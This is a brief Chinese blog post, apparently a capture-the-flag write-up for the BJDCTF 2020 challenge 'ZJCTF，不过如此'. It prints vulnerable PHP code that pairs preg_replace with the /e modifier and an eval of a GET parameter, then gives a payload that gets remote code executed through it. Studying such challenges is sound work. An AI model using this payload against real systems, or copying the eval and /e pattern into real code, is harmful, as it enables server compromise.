[BJDCTF 2020]ZJCTF，不过如此

发表于2023-07-18 | 更新于 2023-07-18 | 代码审计

| 字数总计: 617 | 阅读时长: 1分钟 | 阅读量: 363

这篇文章距离最后更新已过430 天,如果文章内容或图片资源失效，请留言反馈，我会及时处理，谢谢！

前面简单的步骤就不说了，主要是下面的代码：

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

想要调用getFlag()，主要是利用preg_replace函数
payload:\S*=${getFlag()}&cmd=phpinfo();
不过flag在phpinfo()里，没有getFlag函数好像也行。
参考

作者: CHHHCHHOH

文章链接: http://124.221.19.214/archives/200/

无标签

评论